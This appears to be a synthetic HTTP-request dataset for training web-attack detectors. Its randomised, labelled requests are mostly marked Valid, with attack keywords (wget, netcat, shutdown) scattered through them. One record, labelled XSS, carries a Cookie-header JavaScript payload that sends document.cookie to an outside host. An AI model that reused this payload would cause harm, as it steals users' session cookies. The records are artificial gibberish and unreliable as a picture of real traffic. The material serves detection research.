Transfer-Encoding: compress

null

End - Id: 46058
Start - Id: 11921
class: Valid
GET /axu/1tihheuiatBoaouBroli/a.sbofpHKdQqiV3u9z/yeonlosbe0thwy/c9g@1Yj2pfO.9W/aToe6n4m7Es/hPPt5apmYAku/uododGcyuU/i56NHI0Jj.dll?suQ-L9L7Ry=pLyn&YWmmm=on+fi&lzPLscriptcwhereg4ls.=moz%3Exeecn%3F5tee&7e4ls=hzvue0soreife&d4aileeOduxu3h=1650447256&oepwsaEoei=09438&ernethnutqbta=ee%3Bw HTTP/1.0
Host: 179.80.9.57:80
Connection: close
Accept: */*
Accept-Charset: windows-1250, iso-10646-ucs-2;q=0.6, iso-8859-1, x-mac-greek;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale=160
Client-ip: 28.135.80.186
Cookie: mHrra1E1oiptmrn=lrn8wai;iotdlobfC=0sb@pedu:E;aRe5TDnuep=456;IHirwrt=657017;nSgoc=pz=i;dihn1itml=uhiex(dhinclude
Cookie2: $Version="8"
Date: Mon, 30 May 05 09:38:39 UTC
ETag: "Zwd-lHPSxRrZEPmq_j"
Expect: sgK2
From: rvee8@dNru.biz
If-Modified-Since: Sun, 07 Aug 05 14:17:38 UTC
If-Unmodified-Since: Tue, 21 Jul 09 23:38:24 UTC
If-Match: "oLok_eVVP4yz8tP96PF"
If-None-Match: *
If-Range: Mon, 03 May 10 23:50:30 UTC
Max-Forwards: 8374
MIME-Version: 8.1
Pragma: Hisiia1=4ak
Proxy-Authorization: Basic dGllaTc6b2Ezcmx5
Authorization: NTLM aVVvZXplYmcxYWh2ZnQybHVhZWxmZnRvcEV5aXlhc3Q4MkF0ZXJlaVRhdXA=
Range: 1-,-240,665474-
Referer: http://siuk8doh.uk/jyzr/stkBzad/7i2lTk7.mpeg
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 3.3; ta-er; rv:5.0.8) Gecko/37931088
UA-CPU: x86
UA-Disp: 566,0698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5682x182
Via: HTTP/8.5 52.4.41.233, 2.0 191.192.228.76
Transfer-Encoding: gzip
Upgrade: cbher/6.1, nIwq3e/3.2, ecb/9.7, iea/0.5, tA99o/3.4
Warning: 289 www.Irbdorr.jpeg "eeerr0uart" "Fri, 11 Mar 05 10:40:23 GMT"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11921
Start - Id: 3204
class: Valid
GET /pLTrUtwS/lq9q.Zfj.jpg?t4ofvOseu=Kmuinsert71acrlikentmo&oot8en1nve=itNduebaihebbtfoh&qjgb-UvX-mCs=nreie&ezOdtfg7ueiirtc=98844444&hch=nWHB3Z&Cbntmllh=792&aain=2oui&linkHdivPGlWA=mrehe2ancb1nltu5mi&imrsumicosjtad=ettTasbchild+P0tefs HTTP/1.0
Host: www.dhrput.st:80
Connection: close
Accept: audio/*, text/*, text/*
Accept-Charset: x-mac-korean, iso-8859-15;q=0.0
Accept-Encoding: identity, deflate, identity, identity
Accept-Language: *;q=0.9
Cache-Control: dtel4el=nogdt
Client-ip: 135.42.222.189
Cookie: ritaeioldva=sc
Cookie2: $Version="5"
Date: Thu, 04 Mar 04 02:34:18 GMT
ETag: "Sqqoqeb1HRptC3yA"
Expect: t3loht
From: y7eto1ef@e1a7nymmi.net
If-Modified-Since: Fri, 10 Dec 04 13:25:14 GMT
If-Unmodified-Since: Sun, 24 Apr 05 13:59:53 GMT
If-Match: *
If-None-Match: "CpUPsEBio1d84uK8w3p"
If-Range: *
Max-Forwards: 72
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: lsahy VvxL4e=Anre
Authorization: Digest response="86aDa663A99D2a63e50BBD6Aaf91e580"
Range: -09285
Referer: /t0eknds.txt
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 3.8; ut-ou; rv:2.7.4) Gecko/64201208
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9049x212
Via: 4.1 www.oOt1igia.css, 7.1 www.vttt1c.shtml
Transfer-Encoding: compress
Upgrade: ehtr/8.3
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 211.183.197.157
X-Serial-Number: 272265156802487
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 3204
Start - Id: 29498
class: Valid
GET /dreeJmneueIntin/vlqqGI/Pocsk.tiff?inRfhaao=w%2Fs+io&ZcOGbJbjr=nICBid0&sTyozesa=Tsn+t&njb=ei7Etqh&cdcps9te=oa7stformnh&Xe2Ryruptvfei=txgmc43O5yt&bhtdxnIftaU4i2R=990&on0hd=yU1w-rK&Strejuatsmhllo=eypis%3Ae%7ECo%26U+tetlink HTTP/1.0
Host: www.detyoGr.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-arabic, x-mac-arabic, x-mac-ce
Accept-Encoding: *
Accept-Language: ie7o-ya
Cache-Control: min-fresh=735
Client-ip: 12.169.110.212
Cookie: OdMiV=200548;Cutyael1ieesnsr=iXphpSueo-<'u72ykst;yijdaarthTseh=i81KIRErG;vmoA=ectmnvgn;5ipsf=ncrnne4R;RIideX_tmpNnhw=glG-9
Cookie2: $Version="83"
Date: Tue, 01 Apr 08 04:41:18 GMT
ETag: W/"IwBlkMjwH-h7qS74"
Expect: 100-continue
From: hnoyso@ioJaegaa.st
If-Modified-Since: Sat, 14 Apr 07 17:58:44 UTC
If-Unmodified-Since: Wed, 22 Mar 06 08:48:02 CET
If-Match: "HdPVKnyCNOpuUj9"
If-None-Match: "4J7zvvIw7UTB_Eftg7"
If-Range: "KXJmTmY2010wbOX"
Max-Forwards: 101
MIME-Version: 0.1
Pragma: tfh=ernt
Proxy-Authorization: 40goe uren9esp=e5th
Authorization: NTLM bHBvYXNpaXp1a2RldHNlMmtzc1V6c0MzbnVodW9kaHRob2VkYXM4bU8=
Range: 6551-
Referer: /dsiw9eA/afahiai/IsSh.txt
TE: trailers,gzip
Trailer: Host
User-Agent: Mozilla/5.8 (Windows; U; Windows NT 0.6; sj-hn; rv:5.1.0) Gecko/66334193
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 644x350
Via: 2.6 177.76.150.232:5, HTTP/4.4 180.67.207.188, 1.1 www.y4teaoob.js
Transfer-Encoding: identity
Upgrade: nene/2.6
Warning: 369 www.wbAesst9.html "c8gOtonht" "Fri, 11 Sep 09 04:28:00 UTC"
X-Forwarded-For: 1.97.153.134
X-Serial-Number: 801273405
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29498
Start - Id: 2905
class: Valid
GET /EYG6GaF0TQQ/ncjvybs9igidi/csNp7qnk0/oybgP8PmfqAu_7B/aaB2OQySO/nsaIseeTald/amrseieKEzripd.shtml? HTTP/1.1
Host: www.res4r4seen.gov:74955
Connection: close
Accept: */*
Accept-Charset: macintosh;q=0.9, iso-10646-ucs-2, koi8, utf-8;q=0.4, cp-932
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=94320
Client-ip: 97.193.5.193
Cookie: 1Mr=37;roBqO4fI=e07-3bw;cIrtaat4iHx36=hsok7f;sna=3.yUD7_@8Cg;0i3hgo=3140707;gSL6nt4lBI=htacces?nd e
Cookie2: $Version="03"
Date: Mon, 01 Feb 10 14:35:38 GMT
ETag: W/"7mtuFMnGBqYzpRRxP2UR"
Expect: dtsf=saae
From: oraTcnio@2roehlm.com
If-Modified-Since: Fri, 05 Mar 04 04:28:14 UTC
If-Unmodified-Since: Fri, 15 May 09 22:17:29 UTC
If-Match: *
If-None-Match: "rq0Zzb6BNQGgsft"
If-Range: Sat, 21 May 05 04:01:26 UTC
Max-Forwards: 245
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: aHELco LimsO0e=ho98
Authorization: NTLM bnNtc3VpM081ZW5hemFlanRyZnRwb2xlbHJvaXJFaG1nN214ZWtiZWRzdA==
Range: 30-,846639-,-739
Referer: /EnRl/iassb.bin
TE: gzip;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (X11; U; Linux i586 5.5; oh-ta; rv:7.5.0) Gecko/95995143
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 640x6169
Via: FTP/8.0 www.nsnoa.tiff
Transfer-Encoding: m3ola; KumNjt=enii9t
Upgrade: reaaIy/4.0, ciNa/4.1
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 160.9.8.226
X-Serial-Number: 440914790634409640
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2905
Start - Id: 15101
class: Valid
GET /7D5/elihsiRtgwwx/nmjs4nEreiaPrloCmt/dncfsn6R8z9ki/e2shutdown7xR/tf9ivh9otdi0zehweno.php4? HTTP/1.0
Host: 49.236.218.94
Connection: close
Accept: */*
Accept-Charset: iso-8859-3, x-mac-roman;q=0.8, windows-1257, iso-10646-ucs-2;q=0.1
Accept-Encoding: gzip;q=0.3, compress, compress, gzip
Accept-Language: cetig-jd, ystetl-Ih5rr;q=0.2, nduc-ahE, s-stdnieb
Cache-Control: no-transform
Client-ip: 255.45.221.5
Cookie: FqorXdla=ea);iw=3870;r3di=mtnu
Cookie2: $Version="9"
Date: Sun, 13 Jan 08 05:25:40 GMT
ETag: "0maWvL7l94Pigga1"
Expect: 100-continue
From: rNopit@irtzt.gov
If-Modified-Since: Wed, 24 Mar 04 06:14:10 GMT
If-Unmodified-Since: Wed, 14 Feb 07 02:13:50 CET
If-Match: "ox781B7ONi1Ux0FX"
If-None-Match: "@zlZhtz21y2QuNozET"
If-Range: "wEcgIUZzwvneREenwxP"
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic NGNyZXE6dGUzZWk=
Authorization: Digest nc=F3E510FB
Range: -3610,072048-063,-8
Referer: http://wiaee0.cz/ednIhbzU/syno/heez/6wy5tn5x/iadtao.js
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 4.6; ii-hh; rv:6.9.1) Gecko/71509378
UA-CPU: 68000
UA-Disp: 668,2414,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 761x729
Via: 1.3 www.ftuSbEw.tiff
Transfer-Encoding: compress
Upgrade: n0Vse/5.9, isenso/0.6
Warning: 320 219.5.48.246:443 "Dwmb" "Mon, 06 Mar 06 17:14:37 UTC"
X-Forwarded-For: 85.3.154.75
X-Serial-Number: 1637919647352
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15101
Start - Id: 28573
class: Valid
GET /zNIOwget/aftiCTnnn/2tnlkl/u-4s-aFLBWkNl/VJ/v0eTjMHFUCRG/tp@1zpBfWdBnAObgsp/flRdiSe.aspx?toemv=edv00e+&qmerw9sp=283790&riebhtssogetmid=2cWb&c2etmd=+dinlinkm&pete=sw&OdTNa=dPdZK7dTG&aodQts3ji=styleowIushutdownu&t0s=tAnuqFhzd-&VPEsystem_i=388724&ox=from HTTP/1.0
Host: www.iRut.net
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-korean;q=0.4, iso-8859-6;q=0.9, windows-1257, shift_jis;q=0.3
Accept-Encoding: compress;q=0.2, gzip;q=0.6, compress;q=0.0, gzip;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 32.126.230.226
Cookie: dexfi8b3=mailwns5 da;orhNgshp=ncneaf3'y0w;zoX=e-oid;tl=s/0laenph-?allecg;tB=iIEosr
Cookie2: $Version="5"
Date: Sun, 26 Feb 06 20:15:57 CET
ETag: W/"IlSB0SVupMAYKnpEoST"
Expect: s1yno7eS=hb0h
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Fri, 22 May 09 11:34:49 CET
If-Unmodified-Since: Wed, 15 Apr 09 14:41:03 UTC
If-Match: "p0vikljvZB8SIGDHJy"
If-None-Match: *
If-Range: Tue, 10 Jan 06 03:04:55 CET
Max-Forwards: 006
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dothii rw4uoS=mtsNtaid
Authorization: Digest nonce
Range: 8-800450
Referer: /reoi2et/eqr4ntx/thth/Tedj.pdf
TE: chunked;q=0.6,gzip;q=0.2,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/9.7 (Windows; U; Win 9x 4.9; nj-ho; rv:1.6.9) Gecko/38114009
UA-CPU: StrongARM
UA-Disp: 3600,6698,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5673x9154
Via: 9.4 178.234.36.50, HTTP/2.6 196.123.169.84, 3.2 240.73.201.10:195
Transfer-Encoding: h4tull; nteo=tfpeegr
Upgrade: skz/8.9, 4ei/8.4
Warning: 425 202.135.1.163 "oeae" "Wed, 30 May 07 10:46:17 UTC"
X-Forwarded-For: 247.244.131.237
X-Serial-Number: 37650652134780806
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28573
Start - Id: 33519
class: Valid
POST /lTearhto3w8s/ykZhjniframe/biGYZdncU4tgxOWdNlRg/aG42wCqd5_0Z/replace6K/Zb5AwgetSO-.V/aKzSgx/aRnpRjgC/t-VOcYw7ExWLh/Mthmt8/rnGAWF5TBnDm6Tu69xGj/22i0riMeeanpPavnedc.php3? HTTP/1.1
Content-Length: 264
Content-Language: hcur,ad,sta
Content-Encoding: deflate
Content-Location: http://aCtb.st/hsesTrS/dqsbh/sagxot.sh
Content-MD5: bGtvQ29udTU2VG93Z3J1Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jan 05 21:38:29 UTC
Last-Modified: Sun, 29 Oct 06 15:00:32 GMT
Host: www.ngieebR.gov:3
Connection: keep-alive
Accept: video/quicktime;q=0.5, text/*, image/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.3, compress, identity, identity
Accept-Language: s-csptpht, u-gaitiqb;q=0.4, etuNn-faec, s5ts-aaei;q=0.8
Cache-Control: max-age=2
Client-ip: 101.34.205.241
Cookie: vgotls96s=gtwlrFPihtoi2r6Tel;dl3g=e>nonyn\nIas
Cookie2: $Version="749"
Date: Sat, 04 Jul 09 10:21:46 UTC
ETag: W/"s7IUsgMz4KgdDvA6u"
Expect: srrhDnn
From: Towr@gduxvle.gov
If-Modified-Since: Sat, 15 Jan 05 24:43:47 CET
If-Unmodified-Since: Thu, 02 Jul 09 05:08:08 UTC
If-Match: *
If-None-Match: *
If-Range: "dGEx6CMllplVAU5Dqo6Q"
Max-Forwards: 5
MIME-Version: 5.8
Pragma: tatvesm=h44dmy0
Proxy-Authorization: Basic QVRheXQ4c206RWVkc2VvaA==
Authorization: tloR sre5ih8=cssyot
Range: 90185-
Referer: /efgail4/gehle1/m0oD4rl/eea1zs/ohu6dern.nsf
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: ereha/9.0.7.4
UA-Disp: 9881,7058,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 565x3425
Via: HTTP/1.9 www.mtein.jpeg
Transfer-Encoding: gzip
Upgrade: gfr/9.0, vlr/1.0, ty5ayo/3.2
Warning: 021 29.168.107.5:9738 "vyoao" "Fri, 21 May 04 05:27:03 CET"
X-Serial-Number: 06516057
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

eyneeco=eu0X1kB&wpi=athbs&reAslu9sct=euvAX2Aj8j&fHlibnetcat=mPsl1px&gCpF8bodyftpRDei=)wlthEnap&tkekurehd0n5Rti=(er&le3uroump&OtaPg1ne=46828417&hlkpqb39byC=07&UepWkK@@zi=sxods&txxma=lZuS&lDclnZlalet=ThjeTflibeyMh&ht8ibqusesRoypw=r6&Uoot=tSh&zmaflhycigf1od=319

End - Id: 33519
Start - Id: 27795
class: Valid
GET /onurad/4tnbEMsd/afB-VHh-T/senr2lkmgse36hletn/3fhOK1-mCautoexec33/mt7d1osU7rq9judtna/so99meroalecuefiis/7fe.html? HTTP/1.1
Host: 174.140.13.57:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-1, iso-8859-5, iso-8859-3, iso-10646-ucs-2;q=0.8, euc-tw
Accept-Encoding: identity;q=0.1, deflate;q=0.0, compress, identity;q=0.5, deflate;q=0.0
Accept-Language: *
Cache-Control: ldnJtssv=uicotl
Client-ip: 51.78.154.215
Cookie: lnodbietas=66edocumentkqrep45R;0vxdeleteNGoem=ynautoexecs;imofomkatiswDD9=1n4ksn;ennjrtta7aauhln=fhnsfWtt|;ntemAe=fined0mhetEYwdM
Cookie2: $Version="3"
Date: Fri, 07 Jul 06 16:44:28 UTC
ETag: "Wrf9b4HDRIA3AhajE6_"
Expect: Y3nzt=oehk;kte0euhl
From: omsc@oihc6.biz
If-Modified-Since: Wed, 27 Sep 06 09:07:29 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:45:58 GMT
If-Match: "NcR_Ea6Vs6c4M1cH7"
If-None-Match: *
If-Range: *
Max-Forwards: 0493
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: mntnor HgotSst=Rpgnni
Authorization: nBe2uz boimn5f=y9rrsw
Range: -83593,-88
Referer: http://www.wm7n3.gov/sytjq/coiaytdk/37tseves/otirow6r.txt
TE: trailers
Trailer: TE
User-Agent: op0ssto4s/4.0.8.7
UA-CPU: x86
UA-Disp: 966,647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 364x479
Via: 8.8 www.himdntWi.css:23885
Transfer-Encoding: gzip
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 018 www.etro8lh4.htm "gtbataLtvmooil" "Sat, 31 Jul 04 15:02:55 GMT"
X-Forwarded-For: 90.82.25.41
X-Serial-Number: 00771445760189664084
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27795
Start - Id: 48228
class: XSS
POST /group bylZeval4JUO./P1@u/oxDh0JyeJNj/oRtaDn5n.jpg? HTTP/1.1
Content-Length: 238
Content-Language: l
Content-Encoding: gzip
Content-Location: http://www.hget2t.it/lepaeg.wav
Content-MD5: ckV5dGh3cm5pZXVpYmVpbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Apr 05 17:23:15 UTC
Last-Modified: Sun, 14 Jun 09 14:33:31 UTC
Host: www.uqaa.be
Connection: close
Accept: audio/basic;q=0.3, image/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: compress, deflate;q=0.2, identity;q=0.3, gzip;q=0.4
Accept-Language: *
Cache-Control: min-fresh=475
Client-ip: 25.84.142.78
Cookie: aetpldX=<img     dynsrc=    "     javascript:  [document.location.replace   ('http://www.veer.com/cgi-bin/gengnd.cgi'+document.cookie);] "  >;i9mhcee=307
Cookie2: $Version="830"
Date: Sat, 20 Dec 08 03:33:10 GMT
ETag: W/"cpFzrcC@6hyaKzz"
Expect: 0ehcta7u
From: rzil@bOthlc.biz
If-Modified-Since: Sun, 25 Jan 04 12:45:41 GMT
If-Unmodified-Since: Sun, 05 Nov 06 19:50:51 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 610
Pragma: eaa2='sresoeno'
Proxy-Authorization: Basic ZXd1aWQ3aDp0RWV0bFds
Authorization: Basic ejM0dHc6ZXJ5MGFl
Referer: /enlh7e/itia/tegemr/bsTUsr/mdia9.wav
TE: trailers,gzip
Trailer: From
User-Agent: Mozilla/5.2 (X11; U; Unix 6.4; e2-i5; rv:5.0.4) Gecko/53484082
UA-CPU: PowerPC
UA-Color: color32
UA-Pixels: 1593x216
Via: FTP/8.7 www.alzbtufh.htm, 3.6 225.8.225.188:11
Transfer-Encoding: identity
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pnionrql=Qttrr5hgePgsnma&7krmecswIo=Lt&equssrModectn=tmnb&5Ree=44364304&TymaIErtiyaa=) e&tihwcexsh=85521262&ko6eh3sya=O5sUwinnttS&hfor=17947&ittNaoruo=331&hOeecfdtAi=ta&yScencopnetf=a shva&mo3t=fay&lsxee5edhli7D=6122&earcua=enfc7eTxp_as

End - Id: 48228
Start - Id: 26622
class: Valid
GET /c2WrjLcTZuI.html?ndtnHa=8&mrje=t%2B7access_loggibhavingyrid%29between%3Eu&2te=atgiydid7avni&mocha.Qmv=a%3FS&edeataeetftkte=%26t9&hdsw0=plluaD2rht6n&FB5E-fromZXD=staHe HTTP/1.1
Host: www.enrotnxDt.gov
Connection: close
Accept: image/*
Accept-Charset: macintosh;q=0.6, x-mac-hebrew;q=0.8, windows-1250, x-mac-greek, iso-8859-4;q=0.6
Accept-Encoding: 
Accept-Language: yph0rRta-l48t;q=0.1, nzaeli-lomnf, nEna-iegcsc;q=0.9, sst9sdoi-aeees8;q=0.9, qe0e-acwerea;q=0.2
Cache-Control: min-fresh=0
Client-ip: 147.16.61.41
Cookie: ot9=a4sin@;scTeets=euXdaB;dP.2Z5UCselectT5=0dy;g;ebx5btahfo=ei
Cookie2: $Version="901"
Date: Thu, 11 Mar 04 08:07:36 UTC
ETag: W/"ET8PB8@zCmfVZdsF8cA"
Expect: eEmeoia
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Mon, 28 Sep 09 17:48:29 GMT
If-Unmodified-Since: Fri, 04 Mar 05 04:06:11 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 02 May 04 15:03:40 UTC
Max-Forwards: 4381
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest username="Ernotl4"
Authorization: ehno abhterys=rtjp
Range: 60-,-55,9-
Referer: http://sfaees.fr/sictg/td3etndy/S7ilal/peea.gz
TE: gzip;q=0.7,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 0.1; 2c-0o; rv:6.2.5) Gecko/86972228
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: Bxess/9.6 91.212.184.217
Transfer-Encoding: compress
Upgrade: 2itths/2.9, Hsy/8.5, vnT/6.7
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 98.254.54.114
X-Serial-Number: 21651458708939157204
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26622
Start - Id: 1501
class: Valid
GET /oLDv5/8guedDsj/ftviredki6ceUcChni/20l1GzZyau2UA2./eEEyp6pxJazcO/ir17S/5.TCa1m82mkIsePr@hk9/blCYDisE.htm?ti=xmlnr&lnhfytrNdedsiLb=rR5&bpbinbDk_=we%273%28la%40hform&LmxkTMZ=E HTTP/1.0
Host: 74.30.244.94
Connection: keep-alive
Accept: audio/*;q=0.2
Accept-Charset: iso-2022-jp;q=0.6
Accept-Encoding: *
Accept-Language: tsuttue-Ein, taoe-nioy, td-ottyUi;q=0.3, aeas3ee-2e;q=0.2, omfoi-2euee
Cache-Control: min-fresh=41
Client-ip: 60.76.109.239
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="26"
Date: Thu, 02 Feb 06 20:19:47 CET
ETag: "2hpiJIqnZpGoazCQc8"
Expect: ysnoei=wEEa;me8t2m=hshs
From: 5zeI8@rhKaeemAo.st
If-Modified-Since: Wed, 26 Nov 08 22:22:23 GMT
If-Unmodified-Since: Tue, 13 Apr 04 03:57:00 CET
If-Match: *
If-None-Match: "NAPie-QZUPSqiyypeD"
If-Range: *
Max-Forwards: 06
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: pswi wSleascd=botsh
Range: 460-9787,-3
Referer: http://sta0.fr/uYan/hoti9/irltItk/s4i05eo/Snrsie.js
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 0.8; Rs-ot; rv:6.8.7) Gecko/60792154
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: HTTP/2.0 164.62.61.160, nen/8.2 www.tnsugp2i.tiff
Transfer-Encoding: sedig; tsnf=htdl6
Upgrade: S6gk/9.9, Aoe/4.0
Warning: 564 www.ellu.jpeg:2 "Sei8d" "Thu, 27 Jul 06 21:37:43 UTC"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 894892
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1501
Start - Id: 4950
class: Valid
PUT /I9XR7FueeaZfOTO/rs5X6.gif? HTTP/1.1
Content-Length: 4
Content-Language: Uzt,ikbhdEre
Content-Encoding: deflate
Content-Location: /etseszr/4koI.jsp
Content-MD5: c2VlbmVzbXRsd2F0dml1Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Nov 06 13:24:31 GMT
Last-Modified: Mon, 22 Jun 09 02:57:02 CET
Host: 27.103.229.8
Connection: geadI
Accept: text/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 52.51.133.140
Cookie: fgw8XFRexecp=\gsreplaceautoexecorconnectgaa-or=;4nsed=lhpw hhtpassn(ea(locationda6sopt;cea4=3111464
Cookie2: $Version="357"
Date: Tue, 14 Jun 05 18:37:20 CET
ETag: "qDw.4c53XZCsatH5vZZ"
Expect: 100-continue
From: gneIsg@soeinse9uz.cz
If-Modified-Since: Sat, 28 Aug 04 21:00:56 CET
If-Unmodified-Since: Wed, 04 Jul 07 12:49:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Apr 05 13:04:06 GMT
Max-Forwards: 5
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic bm5hb3JoY2Y6emRlOW9J
Authorization: NTLM a2N0YzFPN3R0c2h3ZXJldVRhbWVoYVRJNWN1bW9pdXNhOXJkaWFyYWFyc0ZFdE8x
Range: -9,-30994,21-971
Referer: http://www.kivyRd77.be/9swcamx/o7nnt/diya.asmx
TE: chunked
Trailer: Expect
User-Agent: e0T_GY http://www.oeir7.st
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7038x743
Via: 6.1 www.uaea.tiff:9, 3.5 www.2o8aoD.png:767, 1.7 www.sld4t.htm:757
Transfer-Encoding: gzip
Upgrade: fFAahd/7.2, t4Oi/2.4
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 18.33.117.239
X-Serial-Number: 79390655563106676515
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ab=u

End - Id: 4950
Start - Id: 30939
class: Valid
GET /hX0nh8se/egO_/diygtRbYs/hoM3eqlfoY3iieiMms/n-DuDrV/Trtcr0esyasdl/S5evOaEvyenii3br7n/iCOcPCcER-h/dt@Guu9vWzI2vXpxq3lp.aspx? HTTP/1.1
Host: www.aSnAw.com:61131
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-cn, windows-1252;q=0.2, iso-8859-4, iso-8859-7;q=0.7, iso-8859-3
Accept-Encoding: gzip
Accept-Language: tnjhsoys-e6bee5l;q=0.5, dnhumU-tuw
Cache-Control: only-if-cached
Client-ip: 101.236.177.119
Cookie: cifo=687;ex2iomh=9a4ec4yhnoensnrOtg;xyapsMstrcyhJrs=4mepRoetonzcon7sog
Cookie2: $Version="8"
Date: Tue, 22 Dec 09 08:52:02 GMT
ETag: W/"K6oqIvmSoqGxJe45r."
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Thu, 15 Nov 07 01:42:54 CET
If-Unmodified-Since: Sun, 04 Jul 04 24:56:43 GMT
If-Match: "KO0OObH3@HBLz8iYw"
If-None-Match: *
If-Range: "L-uyjmuTGLyaqPE0rBr"
Max-Forwards: 720
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: Basic aWN0ZHk6eXViY2c=
Range: 175360-1047,17277-14
Referer: /ybpu/dhnrt.php
TE: deflate;q=0.8,trailers,chunked
Trailer: From
User-Agent: ahpa2i (oRHntqINQ-)
UA-CPU: PowerPC
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9030x738
Via: HTTP/2.3 www.jio3.jpg:578, 6.8 124.210.46.68
Transfer-Encoding: compress
Upgrade: btr9/4.0
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 34.220.136.254
X-Serial-Number: 063295011
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30939
Start - Id: 18965
class: Valid
